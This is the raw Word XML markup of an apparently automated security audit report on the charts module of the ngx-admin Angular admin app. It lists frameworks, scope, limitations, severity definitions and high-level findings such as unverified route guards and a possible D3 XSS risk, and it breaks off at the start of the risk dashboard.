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Security Audit Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">myowjaYOY/ngx-admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated by DocAgent — automated codebase documentation analysis. Based on analysis of 3 screens. Subject matter expert review is recommended before distribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">April 19,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8" w:name="security-audit-report"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Audit Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Application:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ngx-admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Document Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Security Audit Report</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">April 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts Module —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared By:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DocAgent — Automated Codebase Documentation Analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Internal Use Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="X102b2e9de4183984340b81b0bb402a984d3925a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated by DocAgent — automated codebase documentation analysis. Subject matter expert review is recommended before distribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Overall Security Posture Rating: Moderate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The three screens assessed in this audit — the Charts shell (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), the Chart.js showcase (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and the D3 visualization page (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — represent a lightweight, largely presentational tier of the ngx-admin application. The components themselves are architecturally minimal: empty class bodies, no API calls, no user input handling, and no direct data persistence. This minimalism substantially reduces the attack surface at the component level. The application demonstrates sound use of Angular's component separation-of-concerns principle, and the documented awareness of route guard requirements reflects a security-conscious development approach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, the most significant security risks identified in this assessment are not within the component code itself — they arise from what is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">absent or undocumented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the routing module configuration that should enforce authentication and authorization for the entire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">route hierarchy. All three screens explicitly acknowledge that access control is delegated to Angular route guards defined in routing modules that were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not provided for review</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This creates an unverifiable gap: if those guards are misconfigured, absent, or bypassable, the entire charts module becomes publicly accessible. Additionally, the D3 screen introduces a latent XSS risk through D3.js's DOM manipulation APIs in child components, and the Chart.js screen's reliance on hardcoded template data creates maintainability and potential data-integrity concerns. The absence of any security logging or monitoring instrumentation across all three screens means that unauthorized access attempts or client-side errors would go undetected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">top three highest-risk findings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are: (1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Unverified Route Guard Coverage, a potential broken access control issue that could expose the entire charts module to unauthenticated users if guards are absent or misconfigured; (2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-007</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— D3.js XSS via DOM Manipulation in child components, which could allow script injection if user-controlled data reaches D3's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.append()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">methods; and (3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-004</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Absence of Security Logging and Monitoring across all screens, which prevents detection of unauthorized access or abuse. The finding distribution is: Critical: 0, High: 2, Medium: 3, Low: 3, Info: 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assessment is based exclusively on technical documentation review. It does not include dynamic application security testing (DAST), static application security testing (SAST), penetration testing, or runtime analysis. Findings marked "(documented behavior — verify with penetration testing)" require live validation before risk can be formally closed. Findings marked "(not documented — requires security testing to confirm)" represent gaps where the documentation is silent and live testing is the only means of confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="26" w:name="X478de357842dcec0dd61a363127e4d68138dce5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Audit Methodology</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="X82145c5ef56970dbbbf43e9978643bba9e1dc46"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Frameworks and Standards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Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP Application Security Verification Standard (ASVS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">v4.0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Verification requirements across 14 chapters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Risk categorization for web application findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE/SANS Top 25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Standardized weakness enumeration and severity classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NIST SP 800-53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rev 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security control families and assessment criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="Xfe97644315a14b674369a7ccb3eeab2b37f43e5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All screens provided in the April 2026 documentation package for the ngx-admin application:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Charts shell component —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chart.js showcase component —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D3 visualization component —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="Xf8623a4409e0366fba52f07c61b801838ceff21"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Assessment Approach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each screen's documentation was evaluated across eleven security domains: (1) Authentication &amp; Session Management, (2) Authorization &amp; Access Control, (3) Input Validation &amp; Sanitization, (4) Data Protection, (5) API Security, (6) Error Handling &amp; Information Disclosure, (7) Business Logic Security, (8) Client-Side Security, (9) Cryptographic Practices, (10) Security Logging &amp; Monitoring, and (11) Third-Party Integration Security.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="X6a861f1e0b4150ec48f35adc91273c5b0a786ea"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assessment is based on per-screen codebase documentation, not live application testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*.component.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and stylesheet files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*.component.scss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not provided</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for the Chartjs and D3 screens. Findings related to template-level vulnerabilities are flagged as requiring verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Routing module files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">charts-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not provided</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Route guard configuration cannot be confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Angular module declaration files were not provided. The full list of imported components and third-party dependencies cannot be confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No DAST, SAST, software composition analysis (SCA), or penetration testing was performed.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="Xacc066eda8389fd376c56ab6b96e61c24ff4753"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Severity Definitions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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVSS Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.0–10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exploitable vulnerability that allows unauthorized access, data breach, or system compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fix immediately (24h)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.0–8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Significant vulnerability with high probability of exploitation and serious impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fix within 1 week</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.0–6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moderate vulnerability requiring specific conditions to exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fix within 30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.1–3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Minor security weakness with limited exploitability or impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fix within 90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security best practice recommendation or hardening suggestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consider for future work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="X244f8f8bbdbd49635b819a79d92d16199439c22"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Risk Summary Dashboard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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Total Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
